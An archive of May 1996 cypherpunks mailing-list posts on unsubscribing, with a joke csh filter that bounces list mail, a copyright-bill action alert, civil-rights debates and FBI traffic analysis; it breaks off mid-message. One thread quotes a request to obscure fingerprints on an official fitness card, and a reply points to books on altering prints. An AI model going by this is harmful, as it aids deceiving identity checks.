Content-Type: text/plain


> From: Mathew Ellman <mellman@niia.net>
> Date: Mon, 13 May 1996 16:11:54 -0500
> 
> TO ALL MEMBERS, 
>         IM TIRED OF ALL THIS SHIT I HAVE UNSUBSCRIBED MANY TIMES AND ALL I
> GET IS SOME STUPID ASS REPLY ABOUT CLOSED LIST OR ADDRESS NOT MATCHING AND I
> GET NO REPLY SO UNLESS YOU ALL WANT TO GET A BUNCH OF UN WANTED BULLSHIT
> (LIKE THE SHIT IM GETING FROM YOU ) I SUGEST SOMEONE FIND A WAY TO GET ME
> THE FUCK OFF THIS LIST . I HAVE GOT IN TOUCH WITH THE PESON THE REPLY TELL
> ME TO AND NO REPLY. IM TIRED OF ALL THIS SHIT. 

As many of you know, the secret to getting off the cypherpunks mailing
list is closely guarded and only even understood by a few, highly
skilled cryptographers.  The problem is that if there were any simple
way of sending a simple mail message saying, "hey get me off this
list", then the NSA could simply forge this message for every member
of the list thereby suppressing all the subversive information
discussed on this mailing list.

An alternative would be to require a cryptographically signed
unsubscribe message.  However, even then we would run the risk of the
NSA cracking our private keys with their superior technology.
Moreover, President Clinton has made it illegal to use cyptography in
many countries other than the United States, so that foreigners would
still not be able to unsubscribe.

This leaves only one solution, and has resulted in the cypherpunks
philosophy:  "Once a cypherpunk, always a cypherpunk."  Anyone who
joins the cypherpunk mailing list must remain on the mailing list for
the rest of his existence.  Unbeatable, you may think.  How can I get
off the mailing list if there is no way to unsubscribe?

Well, I will now reveal the secret of leaving the cypherpunks mailing.
Before reading further, however, I must ask that you become a US
citizen or permanent resident if you are not one already.  You must
also agree not to discuss this information with any foreigners, as
providing any kind of assistance to non-US cryptographers is a federal
crime for American cicizens.

Now, though you must remain a cypherpunk for the rest of your
existence, you will be removed from the mailing list when you cease to
exist.  The trick to unsubscribing is therefore to convince the
cypherpunks majordomo and the NSA that you non longer exist, when in
fact you really do.  Though for years cypherpunks have thought this
ment cancelling one's E-mail account, there is, in fact, a second,
secret escape route from cypherpunks:  exit code 67.

That's right, if your local mailer exits with code 67 on receipt of
each cypherpunks mail message, you will suddenly seem to have
disappeared.  The cypherpunks will simply believe that the NSA finally
got to you, and that nothing more can be done to communicate with you.
All the while, though, you can continue exchanging private E-mail on
topics other than cryptography.

How then, do you use exit code 67?  First, you must create a file
called "cypherpunks-filter" which contains the following:


#!/bin/csh
setenv PATH /bin:/usr/bin
set username=`id | sed -e 's/).*//' -e 's/.*(//'`
set homedir=~$username
set tmpfile=$homedir/.mailtmp.$$
cat > $tmpfile
if ( { egrep -q '^Sender: owner-cypherpunks@toad.com' \
		$tmpfile } ) then
	rm -f $tmpfile
	exit 67
endif
(rm -f $tmpfile; exec /bin/mail -d $username) < $tmpfile


Then, create a file called ".forward" in your home directory.  In this
file, place the following line:


|"IFS=' '&&exec csh /path/to/cypherpunks-filter #yourlogname"


You must replace '/path/to/cypherpunks-filter' with the actual path of
the the file you just created, and you must replace `yourlogname' with
your actual log name.  After you have done this, you will stop
receivingn all cypherpunks E-mail.  Eventually, you will even be
removed from the mailing list.  Be aware, however, that this procedure
is illegal in Georgia unless you first legally change your name to
"Mailler Daemon".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 14 May 1996 20:03:25 +0800
To: froomkin@law.miami.edu
Subject: Re: Civil liberties of employees (Re: FYB_oss)
Message-ID: <01I4OJI9UR748Y5BUB@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"froomkin@law.miami.edu"  "Michael Froomkin" 14-MAY-1996 03:24:06.58

>On Sun, 12 May 1996, Timothy C. May wrote:
 
>> Actually, one _does_ check one's Constitutional rights "at the door" (of an
>> employer), and the confusion over this issue is pervasively destroying real
>> Constitutional rights.

>Yes and no...and kinda no.

	Umm... you would appear to be discussing the current legal situation,
whereas TCMay was discussing what the situation _should_ be. In the limits
you discuss, the civil liberties of the _employer_ are being seriously
trampled upon.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 14 May 1996 22:00:11 +0800
To: cypherpunks@toad.com
Subject: Copyright law - potential limits on encryption?
Message-ID: <01I4OJOW9SEE8Y5BUB@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I thought the following from CPSR had some relevance, insofar as part
of what the proposed law is trying to outlaw are "devices needed for making
use of encrypted information." The accusations of corporate benefit are
irrelevant, of course.
	-Allen

From: akrause@Sunnyside.COM (Audrie Krause)
Subject: Action Alert: Copyright

Cyber-rights moderator Andy Oram and online activist Jim Warren have
forwarded alerts regarding pending Congressional action on copyright
legislation.

At this late date, the best course of action is a phone call or fax.  You
can reach all members of Congress through the capitol switchboard: (202)
224-3121.  Email messages to Congress are *not* particularly effective.
Detailed information follows from both Jim and Andy.

Audrie

----------------------------
>From Jim Warren:

Check out the examples, below, of how your net access to *any* information
will soon be repressed, prohibited and/or criminalized for corporate
benefit.

THIS REALLY IS AS BAD AS IT SOUNDS.

Although this happens to come from the Americal Library Association and is
thus focused on library concerns with the Beltway ripoff-artists' pervasive
copy-suppression legislation that is being rammed through Congress,
*everyone* online and on computers needs to be aware of this impending
repression.

I donno who Clinton's Copyright Office and Gingrich-Dole's Congress are
representing, but they sure as hell aren't representing the *public's*
interests.

Howl now to your(?) "representatives" ... or bend over for the corporate
hustlers, henceforth.

--jim, a disloyal subject of the Washington Royalty
Jim Warren, GovAccess list-owner/editor, advocate & columnist (jwarren@well.com)
345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request>

------------------------

>Date: Fri, 10 May 1996 17:58:00 -0400
>Sender: owner-ala-wo@ala1.ala.org
>From: ALAWASH E-MAIL (ALAWASH E-MAIL) <alawash@ALAWASH.ORG>
>To: ala-wo@ala.org
>Subject: ALAWON, Vol. 5, No. 24  - ACTION ITEM (220 lines)
>
>
>ALAWON                                        Volume 5, Number 24
>ISSN 1069-7799                                       May 10, 1996
>     American Library Association Washington Office Newsline
>
>
>     URGENT: IMMINENT CONGRESSIONAL ACTION ON NII COPYRIGHT
>LEGISLATION THREATENS TO LEAVE LIBRARIES AND SCHOOLS IN THE LURCH
>
>IMMEDIATE ACTION NEEDED:  Your immediate faxes and calls to key
>House Committee Members critical.
>
>BACKGROUND:
>The House is rushing the "NII Copyright Protection Act" bill to
>"mark up" in the House Courts and Intellectual Property
>Subcommittee on Wednesday of next week, May 15!  The House
>completed its hearings in February on this bill. (Earlier
>ALAWON's have described in detail the "NII Copyright Protection
>Act" taken from the Administration's "White Paper" and introduced
>in Congress last September.)
>
>Worse yet, the Courts and Intellectual Property Subcommittee is
>also considering wrapping the Copyright Term Extension Act (which
>would lengthen the term of copyright protection by 20 years) into
>the "NII Copyright" package on May 15.  That action could short-circuit
>negotiations between ALA and copyright owners that began
>last October to craft an exemption from the term extension for
>libraries, archives and non-profit educational institutions.  If
>approved in its current  form, the bill would:
>
>*** make it a copyright violation to simply browse the Net
>without a license from copyright owners;
>
>*** subject computer system operators -- such as on-line services
>and networks at schools and libraries -- to potentially crippling
>liability for the copyright violations of their users, even if
>the operator;
>
>*** cripple "distance education" efforts especially vital to
>rural communities and the disabled; and
>
>*** make it illegal to manufacture, import or distribute devices
>and software (including computers and VCRs) needed by industry,
>schools and libraries to make "fair use" of encrypted information
>by overruling long-standing Supreme Court precedent.
>
>The Senate is moving deliberately on this tremendously imbalanced
>package and has indicated that changes in it need to be made to
>protect libraries and schools. The Senate Judiciary Committee,
>which just held the first of its own (non-joint) hearings on this
>bill on May 7, and is taking a far more deliberate approach to
>these complicated issues.
>
>In fact, Chairman Hatch appeared open at the hearing to many of
>the proposals backed by libraries and educational groups put
>forward by Prof. Robert Oakley (of AALL) on behalf of the Digital
>Future Coalition, in which ALA has been very active.  (The DFC
>was given one of only five total witness slots at this important
>hearing held coincidentally on ALA's annual Legislative Day.)
>Sen. Hatch also indicated that he would hold at least one
>additional hearing which is likely to include a "library"
>witness.
>
>ACTION NEEDED NOW:
>Please immediately fax a letter to AND CALL all Members of the
>House Intellectual Property Subcommittee listed below who
>represent you or an institution with which you are affiliated.
>These contacts must be made NO LATER THAN Tuesday, May 14 and
>preferably sooner.  Contact info and a sample letter follow.
>
>For more information about the bill, the dangers it poses and the
>constructive solutions offered, please see the DIGITAL FUTURE
>COALITION WEBSITE at http://www.ari.net/dfc
>
>***************************************************************
>Using appropriate style for addressing Congress, please address
>all letters to Members, as listed below e.g., "2346 RHOB" for
>"Rayburn House Office Building", LHOB=Longworth and CHOB=Cannon)
>+ Washington, DC 20515.
>
>Info appears as:
>
>Member and Home City
>Address Phone Fax
>
>Carlos Moorhead     Glendale, CA
>2346 RHOB 225-4176  226-1279
>
>F. James Sensenbrenner   Brookfield, WI
>2332 RHOB 225-5101  225-3190
>
>George Gekas   Harrisburg, PA
>2410 RHOB 225-4315  225-8440
>
>Howard Coble   Asheboro, NC
>403 CHOB       225-3065  225-8611
>Elton Gallegly Oxnard, CA
>2441 RHOB 225-5811  225-1100
>
>Charles Canady Lakeland, FL
>1222 LHOB 225-1252  225-2279
>
>Bob Goodlatte  Roanoke, NC
>123 CHOB       225-5431  225-9681
>
>Martin Hoke    Fairview Park, OH
>212 CHOB       225-5871  226-0994
>
>Sonny Bono          Palm Springs, CA
>512 CHOB       225-5330  225-2961
>
>John Conyers, Jr.   Detroit, MI
>2426 RHOB 225-5126  225-0072
>
>Patricia Schroeder  Denver, CO
>2307 RHOB 225-4431  225-5842
>
>Howard Berman  Mission Hills, CA
>2231 RHOB 225-4695  225-5279
>
>Rick Boucher   Abingdon, VA
>2245 RHOB 225-3861  225-0442
>
>Jerry Nadler   New York, NY
>109 CHOB       225-5635  225-6923
>
>Xavier Becerra Los Angeles, CA
>1119 LHOB 225-6235  225-2202
>
>Xavier Becerra Los Angeles, CA
>1119 LHOB 225-6235  225-2202
>
>                         SAMPLE LETTER
> ****************************************************************
>
>                              [DATE]
>
>[Hon. ____________________
>United States House of Representatives]
>__# __ ____ Office Building
>Washington, D.C. 20515
>
>Dear Representative__________:
>
>     As a member of the American Library Association and an
>active {your connection to libraries and their work, e.g.,
>librarian, trustee, volunteer, etc.}, I am writing today to ask
>that you do everything in your power to assure that two bills now
>pending before the House Courts and Intellectual Property Subcom-
>mittee are not voted out of Committee unless and until they are
>amended to help libraries serve the public in the following ways.
>
>     First, the "NII Copyright Protection Act of 1995" (H.R.
>2441) must be changed to permit libraries to use the latest
>technologies to preserve crumbling older works and to have
>sufficient copies of those works on hand to guarantee their
>survival.  Provisions that will continue to foster "distance
>education" also are critically important.  More broadly, balance
>must be restored to the legislation by adopting a series of
>amendments proposed by the Digital Future Coalition (DFC), many
>of which are based on a strong commitment to the Fair Use
>Doctrine.  I share that commitment.  If Congress is to update
>copyright law for the digital age, the rights of copyright owners
>and the needs of information users must both be fully respected
>and advanced.  I support the DFC's package of amendments to the
>Copyright Act, particularly those related to Sections 106, 107
>and 108.
>
>     Second, and just as critically, the "Copyright Term
>Extension Act"(H.R. 989) must also be rebalanced to protect and
>foster library preservation efforts and education at all levels.
>In its current form, this bill would extend the length of
>copyright in published materials by 20 years.  It would also
>lengthen the term of copyright for unpublished works by 10 years.
>In other words, the bill will impose a 10 or 20 year moratorium
>on works entering the public domain.  The costs of tracking down
>the owners of these works (often 100 or more years old) imposes
>costs on libraries better spent on serving the public.  ALA's
>representatives in Washington have been negotiating a suitable
>amendment to this bill with major copyright industries since
>December of last year.  The Register of Copyrights is mediating
>those talks.  Please do everything that you can to allow that
>process, which I am told is going well, to bear fruit.  Premature
>action on this bill would be disastrous for libraries and
>schools.
>
>     Thank you very much for helping libraries make the most of
>new technology and the Internet to bring the benefits of
>information technology to all Americans, and especially those in
>[INSERT THE NAME OF YOUR STATE, CITY OR COUNTY REPRESENTED BY THE
>MEMBER TO WHOM YOU'RE WRITING].  ALA's Washington Office staff
>would be pleased to provide you or your office with more
>information.  They can be reached at 202-628-8410.
>
>                                        Sincerely,
>
>_________________________________________________________________
>ALAWON is a free, irregular publication of the American Library
>Association Washington Office.  To subscribe, send the message
>"subscribe ala-wo [your_firstname] [your_lastname]" to <listproc
>@ala.org>.  ALAWON archives gopher.ala.org; select Washington
>Office Newsline.  Web page HTTP://www.ala.org/alawashington.html.
>
>ALA Washington Office                            202.628.8410 (V)
>1301 Pennsylvania Ave., NW, #403                 202.628.8419 (F)
>Washington, DC 20004-1701                Lynne E. Bradley, Editor
><alawash@alawash.org>                           <leb@alawash.org>
>Contributor to this issue:               Adam M. Eisgrau
>                                                <ame@alawash.org>
>
>All materials subject to copyright by the American Library
>Association may be reprinted or redistributed for noncommercial
>purposes with appropriate credits.

---------------

>From Andy Oram:

(Introduction from moderator: the message below does not explain how
all the awful consequences it predicts could stem from some extensions
to copyright law.  I think the worrisome section of the bill is the
one prohibiting "any device, product, or component incorporated into a
device" that can circumvent copyright.  Despite language about its
"primary purpose," such language could be used against legitimate
computer and communications equipment.--Andy)

Sender: John Whiting <100707.731@CompuServe.COM>

---------- Forwarded Message ----------

From:   Labor Committee on the Middle East, INTERNET:melblcome@igc.apc.org
TO:     Democracy Now and Then, INTERNET:DEMOCRACY-NOW@IGC.APC.ORG
        Forum KPFA, INTERNET:FREEKPFA@COCO.CA.ROP.EDU
        (unknown), INTERNET:PACNEWS@AOL.COM
        (unknown), INTERNET:PNN@IGC.APC.ORG
DATE:   12/05/96 02:35

RE:     Action Needed on Intellectual Property Bill

URGENT MESSAGE:

Below is an alert regarding the May 15 Mark-up of HR 2441.  Please
post this text on your Web Sites and forward it to all interested parties.
Specific efforts should be made to have people in the districts of
members of the IP Subcommittee contact their representatives.  A link to
the DFC Web Site can be made by linking your Web Site to
http://www.ari.net/dfc -- a thumbnail graphic for the link can be found at
http://www.ari.net/tlogo.gif

Suggested text for letters to Representatives will follow shortly.

**************************************************************

YOUR IMMEDIATE FAXES AND CALLS TO CONGRESS NEEDED TO SLOW IMMINENT
ACTION ON BADLY FLAWED CYBERSPACE COPYRIGHT BILL

Congressional contacts urgently needed NO LATER THAN Tuesday,
May 14..................


Next Wednesday, May 15, the House Judiciary Committee's Intellectual
Property Subcommittee is scheduled to consider amendments to, and
vote on approval of  HR 2441, the "National Information Infrastructure
Act of 1995."  Such approval, if given, would give an important boost to
passage of a legislative package heavily backed by -- and tilted in favor
of -- the movie, recording, and publishing industries (and other large
"content providers").  If passed in its current  form, the bill would:

*** make it a copyright violation to simply browse the Net without a
license from copyright owners;

*** subject computer system operators -- such as on-line services and
networks at schools and libraries -- to potentially crippling liability for the
copyright violations of their users, even if the operator;

*** cripple "distance education" efforts especially vital to rural
communities and the disabled; and

*** make it illegal to manufacture, import or distribute devices and
software (including computers and VCRs) needed by industry, schools
and libraries to make "fair use" of encrypted information by overruling
long-standing Supreme Court precedent.

WRITE AND CALL MEMBERS OF THE HOUSE JUDICIARY INTELLECTUAL
SUBCOMMITTEE AND KEY FULL COMMITTEE MEMBERS NOW (list and
information below)!!!  Tell them that:

** These issues, and the healthy development of the Net are of critical
concern to you, AND

** The May 15 meeting of the Intellectual Property Subcommittee is **too
soon**.  Congress should take the time needed to understand and
adequately deal with **all ** of the complicated issues raised by HR
2441 before it takes action.

For more information about the bill, the dangers it poses and the
constructive solutions offered, please see the DIGITAL FUTURE
COALITION Website at http://www.ari.net/dfc.

Please get your faxes and calls to the following members of Congress,
especially those Members who represent you, NO LATER THAN
Tuesday, May 14:


[DATE]

The Honorable {name}
United States House of Representative
__#__ ____ Office Building
Washington, D.C. 20515

Dear Representative__________:

     I am writing today to ask that you do everything in your power to assure
that no action is taken by the House Subcommittee on Intellectual Property on
the "NII Copyright Protection Act of 1995" (HR 2441) until a broad consensus
can be reached on how to resolve a number of issues of critical mportance to
me and, in my view, the future of the Internet.  As I understand it, this bill
in its current form, would seriously undermine the ability of businesses,
inventors, schools and librraies to make full use of the Internet's great
potential.  Specifically, H.R. 2441 would :

* make it a copyright violation to simply browse the Net without a license
from copyright owners;

* subject computer system operators -- such as on-line services and networks at
schools and libraries -- to potentially crippling liability for the copyright
violations of their users, even if the operator has no knowledge of such
violations;

* thwart "distance education" efforts especially vital to rural communities
and the disabled; and

* make it illegal to manufacture, import or distribute devices and
software (including computers and VCRs) needed by industry, schools and
libraries to make "fair use" of encrypted information by overruling long-
standing Supreme Court precedent.

     Please don't allow the fears of major copyright owning industries to
cripple the Internet for the rest of America.  I urge you and other members
of the House Judiciary Committee to take the time necessary to understand and
thoroughly debate all of the proposed amendments to H.R. 2441, including those
proposed by the Digital Future Coalition.

     Thank you very much for helping make the most of new technology and the
Internet to bring the benefits of information technology to all Americans, and
especially those in [INSERT THE NAME OF THE DISTRICT/CITY].

          Sincerely,

ALERT (fwd)

END

 ~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~-~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~
 Posted by Andrew Oram  - andyo@ora.com - Moderator: CYBER-RIGHTS (CPSR)
   Cyber-Rights:  http://www.cpsr.org/cpsr/nii/cyber-rights/
                  ftp://www.cpsr.org/cpsr/nii/cyber-rights/Library/
   CyberJournal:  (WWW or FTP) --> ftp://ftp.iol.ie/users/rkmoore
 Materials may be reposted in their _entirety_ for non-commercial use.
 ~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~-~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~

--
Audrie Krause          CPSR Executive Director
PO Box 717   *   Palo Alto, CA     *     94302
Phone: (415) 322-3778   *  Fax: (415) 322-4748
*    *     E-mail: akrause@cpsr.org     *    *
 *  Web Page: http://www.cpsr.org/home.html *






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 14 May 1996 22:59:32 +0800
To: tcmay@got.net
Subject: Re: Fingerprinting annoyance
Message-ID: <01I4ONUV5GI88Y5D1N@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 14-MAY-1996 04:46:37.08

>Trying to convince a company that photo ID badges and fingerprints are Bad
>Things is perhaps admirable, just realize that in a free society that
>employer is under no obligation to hire someone who refuses to go along
>with the company's security policies. (This relates to the "civil rights"
>thread.)

	While in general I agree, he never said it was a company. If it was
a government, for instance, I can see it as being ethical; the same for a
government-caused requirement (like the drug war nonsense) or a
government-supported company (like Airbus in Europe, or others supported by
tarrifs.) Since he didn't say, I forbode to answer (mine would have been
about like uni's one of superglue, although I haven't heard the needle idea
before.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Tue, 14 May 1996 20:12:15 +0800
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.3.89.9605132007.A29528-0100000@netcom17>
Message-ID: <Pine.3.89.9605140710.A4366-0100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain


	Paul:

On Mon, 13 May 1996, Paul S. Penrod wrote:
> There may be a book or to on the subject. The local library may carry 
> refernce or other materials on police, detective and forensics. You 

	<< From the 1990 Loompanics Unlimited Catalog >>

	The Fingerprint Identification System 

	How Intelligence Agents Change Their Fingerprints

	Loompanics Unlimited
	P O Box 1197
	Port Townsend WA 98368

        xan

        jonathon
        grafolog@netcom.com



**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
*			     OR					     *
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Wed, 15 May 1996 04:08:34 +0800
To: don@cs.byu.edu
Subject: Re: Accidental subscriber needs help off of list.
In-Reply-To: <ML-2.2.832063139.1541.don@wero.cs.byu.edu>
Message-ID: <m0uJJOm-0000rfC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Don enscribed thusly:

> > >...and I was accidently placed on your Cyberpunk mailing

> Uh huh....

	"Accidentally" I would find hard to believe.  "Maliciously" is
much more likely.

> unless someone's got a web page that autosubscribes people (and if there
> is, please turn it off) I somehow doubt the accuracy of this description.

	I didn't catch the original message so maybe there is more to
the matter that what appear from the one line quote.  There is a problem
right now with jerks maliciously subscribing people to lists they've never
heard of.

	I'm associated with several lists over at iss.net and I don't
know how many times we've seen Newt Gingrich subcribed to all of our lists.
I don't think its and accident and I don't think Newt is really all that
interrested in everything we offer.  A very high percentage of our
unsubscribe requests include a message saying "How did I get on this list".

	I'm also seeing some indication that this may be extending to some
of the downstream remailers and exploders.  How would one get unsubscribed
from a list if they can't even determine where they're subscribed at?

	Many mailing lists are now requiring request confirmations before
they will add or remove someone's subscription.  We're still considering
it.  It may prove to be the only viable solution to deal with the plague.

> PS: does anyone know when nntp.hks.net will get cypherpunks working again?
> Noise like what I'm writing now is *much* easier to skip via nntp...

> Don

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Hughes <eric@sac.net>
Date: Wed, 15 May 1996 10:25:20 +0800
To: cypherpunks@toad.com
Subject: Traffic analysis by FBI against Earth First
Message-ID: <2.2.32.19960514155857.0069bd4c@flamingo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


Remember the phrase "social networks analysis".  The FBI seems to use it as
a term of art.

I'm right now listening to Judy Bari on the pirate radio station in Berkeley
(104.1 FM).  She's being interviewed over the telephone and talking about
her court case against the FBI relating to the coverup of the bombing that
she's being charged for.  (It was under her own car seat, for those of you
who know nothing about this.)

In any case, there have been depositions and discoveries in this case, and
one of the revelations was that there was a document the FBI seized (under
circumstances I'm not familiar with) with which they wanted to perform a
social networks analysis upon.  

It was the interviewer's phone and addess book.

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 15 May 1996 10:50:51 +0800
To: cypherpunks@toad.com
Subject: Nature of Rights
Message-ID: <adbdfc49030210049d28@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:09 AM 5/14/96, Allen Ethridge wrote:

>And on another thread, if rights are simply restrictions on the
>government and not attributes (inate, even) of the individual, then they
>are meaningless.

I presume you're speaking about my point....

This is generally not the place to have long debates about the nature of
government and of civil rights, but it bears mentioning that the
Constitution of the United States _is_ primarily about the delineation of
the role of government, not of private entities, corporations, clubs,
social groups, etc.

Thus, "Congress shall make no law regarding the establishment of religion"
refers to freedom from coercion by government about religion, and to
separation of church and state. It has nothing to do with whether you or I
feel our "rights" within the First Unified Temple of Baal are being
properly respected.

And so on for various other enumerated rights, including the right of free
speech, the right to keep and bear arms, the right of free association, and
so on.

As nearly every argument in this area points out, your right to free speech
does not mean you get to use my newspaper, nor my public address system,
nor my computer service.

The so-called innate or intrinsic rights ("life, liberty, and the pursuit
of happiness") are basically bromides. Philosophical arguing points for a
view of government as being limited in scope.

Converting a slogan like this to assume this means government will
guarantee jobs for all, or will provide two cars in every driveway, or
whatever, has been fraught with problems.  Not the least of which are that
such goals are inimical to the actual, enumerated rights.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Tue, 14 May 1996 20:04:50 +0800
To: minow@apple.com (Martin Minow)
Subject: Re: Notes from the SF Physical Cypherpunks meeting
In-Reply-To: <v02140b04adbdbf22398d@[17.202.12.102]>
Message-ID: <199605140714.JAA23406@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



[I've cc:ed this note to one of the designers of KOM,
 Jacob Palme. Hi Jacob! -cwe]

| Thanks to everyone who took the trouble to correct errors in my
| notes from Saturday's Cypherpunks meeting. They were written
| for my own benefit -- and for the benefit of some friends who
| couldn't be there. Since I can give away information without
| losing it (to misquote Thomas Jefferson), I'm happy to share it
| with the cypherpunks.
| 
| A comment from Matts Kallioniemi might be worth some further discussion:
| 
| >>COM e-mail/bbs system (Sweden) -- operator could backup
| >>e-mail, but not read it.
| >
| >Sure. The database was encrypted by using XOR with the string
| >"KOM". That was the sorry state of encryption in the early eighties.
| >
| 
| Encrypting the database with a fixed string offers a good example
| of how "locks keep honest people honest." This would prevent an
| operator from unintentionally reading a message in case it was
| revealed by, perhaps, a disk sector editor or crash dump.
| 
| I suspect that the state of encryption in Sweden in the early
| eighties was somewhat stronger than XOR (wasn't Hagelin a Swede who
| moved to Switzerland to start Crypto AG?), but not necessarily
| visible to the general public.
| 
| The Swedish government has a rather strong tradition of protection
| of individual privacy (encrypting COM e-mail is one example).
| For example, the initial Swedish implementation of a national
| criminal database in the mid 1970's (equivalent to the US NCIC) used
| dialback telexes to prevent unauthorized (and untracked) access.
| A recent newspaper article noted that some police officers were
| being investigated for unauthorized access to the personal information
| of a collegue who had complained of sexual harassment.
| 
| Martin Minow
| minow@apple.com
| 
| 
| 
| 
| 
| 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 15 May 1996 06:21:44 +0800
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.3.89.9605132022.A29528-0100000@netcom17>
Message-ID: <Pine.SUN.3.93.960514091808.3611A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 May 1996, Paul S. Penrod wrote:

> 
> 
> On Mon, 13 May 1996, Senator Exon wrote:
> 
> > in connection with a character and fitness report i have been
> > asked to supply a review board with a set of my fingerprints
> > i have never been fingerprinted before
> > i am not very keen on the idea now
> > of course refusing will attract suspicion
> > short of getting someone else to put their fingers in ink for
> > me does anyone have a cute method by which to obscure my prints
> > on those cute little cards without it being obvious?
> > i can fill out and manipulate the card myself i just need a
> > working method.
> > is there no privacy advocate who can help me?
> > 
> 
> First off, if you were born in the US, they have your feet and/or hand 
> prints on record.

Incorrect.
Several states do not bother to print infants at birth.
Several hospitals do not bother to follow state guidelines in those states
which do so require.

It is one of the great advantages of the United States that no
standardized procedure for person identification exists.  Seals and
certificates vary from jurisdiction to jurisdiction.  Cross the border to
a state and a hospital birth annoucement is enough for a drivers license,
cross again and 4 pieces and a note from mom isn't enough.

Be careful with disinformation please.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 15 May 1996 11:10:30 +0800
To: cypherpunks@toad.com
Subject: Re: Civil liberties of employees (Re: FYB_oss)
Message-ID: <adbe008e040210049e00@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:29 AM 5/14/96, E. ALLEN SMITH wrote:
>From:   IN%"froomkin@law.miami.edu"  "Michael Froomkin" 14-MAY-1996 03:24:06.58

>>Yes and no...and kinda no.
>
>        Umm... you would appear to be discussing the current legal situation,
>whereas TCMay was discussing what the situation _should_ be. In the limits
>you discuss, the civil liberties of the _employer_ are being seriously
>trampled upon.

Exactly.

As I described in another post last night, this is the point.

I've mostly given up on trying to change the existing laws and political
system...it is too far down the path de Tocqueville described a century and
a half ago (roughly, "America's great experiment with democracy will last
only until the populace discovers it can pick the pockets of others at the
ballot box.").

Strong cryptography at least returns "freedom of association" to us, albeit
not with True Names, and may return other freedoms to us as well.

By bypassing democracy, the true enemy of liberty.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 15 May 1996 05:28:50 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Notes from the SF Physical Cypherpunks meeting
Message-ID: <199605141322.GAA12489@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: minow@apple.com (Martin Minow)
> Subject: Re: Notes from the SF Physical Cypherpunks meeting
[...]
> The Swedish government has a rather strong tradition of protection
